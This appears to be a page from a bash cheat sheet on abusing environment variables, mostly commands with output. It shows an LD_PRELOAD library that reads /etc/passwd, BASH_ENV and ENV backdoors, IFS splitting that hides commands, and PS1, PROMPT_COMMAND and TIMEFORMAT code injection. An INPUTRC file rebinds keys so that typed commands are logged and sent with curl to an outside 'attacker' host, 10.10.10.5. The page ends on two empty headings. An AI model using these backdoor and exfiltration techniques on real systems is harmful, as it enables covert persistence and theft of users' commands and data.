Bash Cheat SheetsEnvironment Variables

Environment Variables

LD_PRELOAD injection

$ echo 'int isatty(int fd) { system("cat /etc/passwd");  return 1; }' | gcc -x c -o /tmp/libmistraleuhpwn.so -shared -

$ LD_PRELOAD=./libmistraleuhpwn.so ls

BASH_ENV backdoor

$ echo 'id >> /tmp/backdoor.log' > /tmp/.bashrc_evil

$ BASH_ENV=/tmp/.bashrc_evil bash -c 'echo "innocent script"'

Non-interactive bash sources BASH_ENV before running. Perfect for cron/script backdoors.
innocent script

$ cat /tmp/backdoor.log

uid=1000(mistrale) gid=1000(mistrale) groups=1000(mistrale)

$ export ENV=/tmp/.bashrc_evil

POSIX shells use ENV instead. Works on dash, ash, busybox sh.
$ sh -c 'echo "running sh"'

running sh

IFS splitting RCE

$ x='i]d'; IFS=']'; $x

Setting IFS changes how bash splits words
uid=1000(mistrale) gid=1000(mistrale)



$ cmd='c]a]t /]e]t]c]/]p]a]s]s]w]d'

$ IFS=']'; $cmd | head -1

root:x:0:0:root:/root:/bin/bash

PS1/PS4/PROMPT_COMMAND injection

$ PS1='$(id>/tmp/ps1.log)$ '

$ ls >/dev/null

$ cat /tmp/ps1.log

uid=1000(mistrale) gid=1000(mistrale) groups=1000(mistrale)



# C2 beacon on every Enter press

$ PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }'

$ set -x

$ echo test

+(stdin:1): echo test

test



$ PROMPT_COMMAND='id > /tmp/log.log'

Runs after every command, before prompt. Ideal for exfiltration.
$ rm /tmp/ps1.log /tmp/trace.log 2>/dev/null

Nameref hijacking

$ declare wallet_balance=1337

$ printf 'before: %s\n' "$wallet_balance"

before: 1337

$ target_var=wallet_balance

$ declare -n ref="$target_var"

Strings become live pointers. Touch the ref, mutate the original.
$ ref=$((ref + 865))

$ printf 'after : %s\n' "$wallet_balance"

after : 2202

File descriptor trick

# Normal output : fd = 1 (stdout)

$ ls -la

total 728

[...]

-rw-r--r--@   1 nathan  staff    3194 Nov 23 21:40 README.md

drwxr-xr-x@  17 nathan  staff     544 Nov 18 21:41 app

[...]



# Error output : fd = 2 (stderr)

$ ls -la >&2

total 728

[...]

-rw-r--r--@   1 nathan  staff    3194 Nov 23 21:40 README.md

drwxr-xr-x@  17 nathan  staff     544 Nov 18 21:41 app

[...]



# Input output: fd = 0 (stdin)

$ /bin/bash -c 'ls -la >&0' >&/dev/null

total 728

[...]

-rw-r--r--@   1 nathan  staff    3194 Nov 23 21:40 README.md

drwxr-xr-x@  17 nathan  staff     544 Nov 18 21:41 app

[...]

BASH_XTRACEFD exfiltration

# BASH_XTRACEFD - Redirect xtrace to any FD

$ exec 3>/tmp/trace.log

$ BASH_XTRACEFD=3

$ set -x

$ id

uid=1000(mistrale) gid=1000(mistrale) groups=1000(mistrale)

INPUTRC key injection

# INPUTRC - Hijack readline keybindings

$ cat > /tmp/.inputrc << 'EOF'

# Ctrl+L clears screen AND runs payload

"\C-l": "\C-uclear; curl -s http://10.10.10.5/beacon\C-m"

# Enter key logs command before executing

RETURN: "\C-e | tee -a /tmp/cmd.log\C-m"

# Ctrl+C sends command to attacker before SIGINT

"\C-c": "\C-a\C-k curl -s 'http://10.10.10.5/abort?c=\C-y' &\C-m\C-c"

EOF

$ export INPUTRC=/tmp/.inputrc

$ bash  # New shell loads evil inputrc

# Every Enter, Ctrl+C, Ctrl+L now backdoored

TIMEFORMAT RCE

$ # TIMEFORMAT - RCE via time builtin

$ TIMEFORMAT=$'real\t%R\n$(id>/tmp/time.log)'

$ time sleep 0.01

real	0.012

$ cat /tmp/time.log

uid=1000(mistrale) gid=1000(mistrale) groups=1000(mistrale)

Bypass if statement

Globbing tricks